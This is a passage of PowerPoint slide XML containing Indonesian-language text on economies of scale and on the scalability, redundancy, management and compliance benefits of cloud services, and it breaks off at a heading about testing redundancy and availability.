            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>skala</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ekonomisnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>Nb. "Skala </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>ekonomi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>konsep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>mengacu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>keuntungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>biaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>dicapai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>bisnis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>ketika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>meningkatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>produksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> dan output. Pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>dasarnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>semakin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>banyak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>perusahaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>memproduksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>semakin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>murah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>biaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>dikeluarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>mengirimkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>produk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Skalabilitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisnis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggabungkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kemampuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berlebihan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanpa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berlebihan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Misalnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keragaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>geografis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disediakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyedia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membantu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melindungi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemadaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> regional </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bencana</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tetapi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggabungkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jenis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>redundansi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>swasta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> mahal dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beralasan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Penerapan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kemampuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cepat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>saat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> platform cloud </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengatur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menerapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berlebihan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cepat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jauh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cepat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daripada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dilakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>saat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membangun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>infrastruktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>awal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Manajemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disederhanakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>faktor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lainnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyedia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menawarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengurangi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerumitan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengelola</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>infrastruktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berlebihan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Peningkatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kepatuhan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pertimbangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyedia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berinvestasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>besar-besaran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bidang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membantu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memenuhi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>persyaratan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peraturan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perlindungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>redundansi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Menguji</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Redundansi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Ketersediaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
